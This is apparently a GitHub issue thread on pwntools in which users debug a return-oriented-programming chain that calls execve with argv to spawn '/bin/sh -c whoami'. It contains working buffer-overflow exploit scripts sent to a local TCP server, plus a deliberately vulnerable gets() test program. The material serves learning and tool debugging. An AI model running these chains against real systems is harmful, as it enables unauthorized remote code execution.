### ISSUE TITLE
ROP.call execve syscall ignores parameter 

### ISSUE THREAD

**Issue by rommarius** [Gallopsled/pwntools#2409]
wasn't able to spawn a shell with command as parameter:
```py
bin_sh = libc.address + 0x111111
rop = ROP(program, base=0x7fffffffe460)
rop.call('execve', [bin_sh, [[b'/bin/sh'], [b'-c'], [b'whoami']], 0])
chain_1  = b''
chain_1 += b'\x00'*136 # chain_1 += b'B'*6
chain_1 += rop.chain()
```

when i use SROP with write what where gadgets to build a arbitrary string in memory i'm able to spawn a shell but i failed to  build an array for the rsi register argv[].
is there any better explaination?

**Comment by rommarius** [comment]
```gdb
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe580 --> 0x7fffffffe5a0 --> 0x0
0008| 0x7fffffffe588 --> 0x68732f6e69622f ('/bin/sh')
0016| 0x7fffffffe590 --> 0x242424242400632d ('-c')
0024| 0x7fffffffe598 --> 0x2400696d616f6877 ('whoami')
```

**Comment by Arusekk** [comment]
Remember to null-terminate your argv. Hope that helps.
```py
rop.call('execve', [b'bin_sh', [[b'/bin/sh'], [b'-c'], [b'whoami'], 0], 0])
```

EDIT: I wrote sth about double brackets, but I was wrong. Sorry for confusion.

**Comment by rommarius** [comment]
thank for the fast response:
but it seems here that the 0 at the end is interpreted as parameter!
spaws a shell but getting this error:

whoami: 0: cannot open : No such file

**Comment by Arusekk** [comment]
Please paste your full code, I think you used `b'0'` instead of `0`.

**Comment by rommarius** [comment]
`from pwn import *

program = context.binary = ELF('./TCPForkSocketServer_64Bit', checksec=False)
context.update(arch='amd64', os='linux')
libc = program.libc
libc.address = 0x00007ffff7d8b000

HOST = '127.0.0.1'
PORT = '10000'

#

bin_sh    = libc.address + 0x1d8678
system    = libc.address + 0x0000000000050d70

rax       = 0x00000000004012aa # pop rax ; ret
rdi       = 0x00000000004012b7 # pop rdi ; ret
xor       = 0x00000000004012de # xor rax, rax ; ret
syscall   = 0x00000000004012fc # syscall
ret       = 0x000000000040101a # ret
write     = 0x00000000004012ed # mov qword ptr [rdi], rax ; ret
where     = program.bss()

#

#rop = ROP(program)
#rop.call('execve', [bin_sh, 0, 0])
#chain_1  = b''
#chain_1 += b'\x00'*136 # chain_1 += b'B'*6
#chain_1 += rop.chain()
#print(rop.dump())

rop = ROP(program, base=0x7fffffffe460)
rop.call('execve', [bin_sh, [[b'/bin/sh'], [b'-c'], [b'whoami'], 0], 0])
chain_1  = b''
chain_1 += b'\x00'*136 # chain_1 += b'B'*6
chain_1 += rop.chain()
print(rop.dump())

#

p = remote(HOST, PORT)
p.recvuntil(b'Hello, client.', timeout=5)
p.send(chain_1)
p.interactive()
`

**Comment by rommarius** [comment]
from pwn import *

program = context.binary = ELF('./TCPForkSocketServer_64Bit', checksec=False)
context.update(arch='amd64', os='linux')
libc = program.libc
libc.address = 0x00007ffff7d8b000

HOST = '127.0.0.1'
PORT = '10000'

bin_sh    = libc.address + 0x1d8678
system    = libc.address + 0x0000000000050d70
rax       = 0x00000000004012aa # pop rax ; ret
rdi       = 0x00000000004012b7 # pop rdi ; ret
xor       = 0x00000000004012de # xor rax, rax ; ret
syscall   = 0x00000000004012fc # syscall
ret       = 0x000000000040101a # ret
write     = 0x00000000004012ed # mov qword ptr [rdi], rax ; ret
where     = program.bss()

rop = ROP(program, base=0x7fffffffe460)
rop.call('execve', [bin_sh, [[b'/bin/sh'], [b'-c'], [b'whoami'], 0], 0])
chain_1  = b''
chain_1 += b'\x00'*136 # chain_1 += b'B'*6
chain_1 += rop.chain()
print(rop.dump())
p = remote(HOST, PORT)
p.recvuntil(b'Hello, client.', timeout=5)
p.send(chain_1)
p.interactive()

**Comment by rommarius** [comment]
hey it seems that the `-c` parameter gets ignored, can someone explain me why? the stack seems looking correct.
```
bin_sh    = libc.address + 0x1cb42f
system    = libc.address + 0x0000000000050d70

rop = ROP(program, base=0x7fffffffe400)
rop.call('execve', [bin_sh, [[bin_sh], [b'-c'], [b'whoami'], 0], 0])
chain_1  = b''
chain_1 += b'\x00'*136 # chain_1 += b'B'*6
chain_1 += rop.chain()
print(rop.dump())
```

getting this error ```/bin/sh: 0: cannot open whoami: No such file```

when i type in my terminal ```/bin/sh whoami``` gettiing the same error that why i think the `-c` parameter gets ignored for unknown reason. my argv is still null terminated without i would get  SIGSEGV.

**Comment by peace-maker** [comment]
Your `base` stack address seems to be off by 8. I've tested your code with this and it prints my username:

```py
from pwn import *
program = context.binary = ELF('./test')

io = process()
libc     = io.libc
buf_addr = int(io.recvline().split(b': ')[1], 16)
ret_addr = buf_addr + 0x10
bin_sh   = next(libc.search(b'/bin/sh'))

rop = ROP(libc, base=ret_addr)
rop.call('execve', [bin_sh, [bin_sh, [b'-c'], [b'whoami'], 0], 0])
print(rop.dump())
io.sendline(flat({0x10: rop.chain()}))
io.interactive()
```

```c
// gcc -o test -fno-stack-protector test.c
#include <stdio.h>
int main() {
	char buf[8];
	printf("buf: %p\n", &buf);
	gets(buf);
}
```
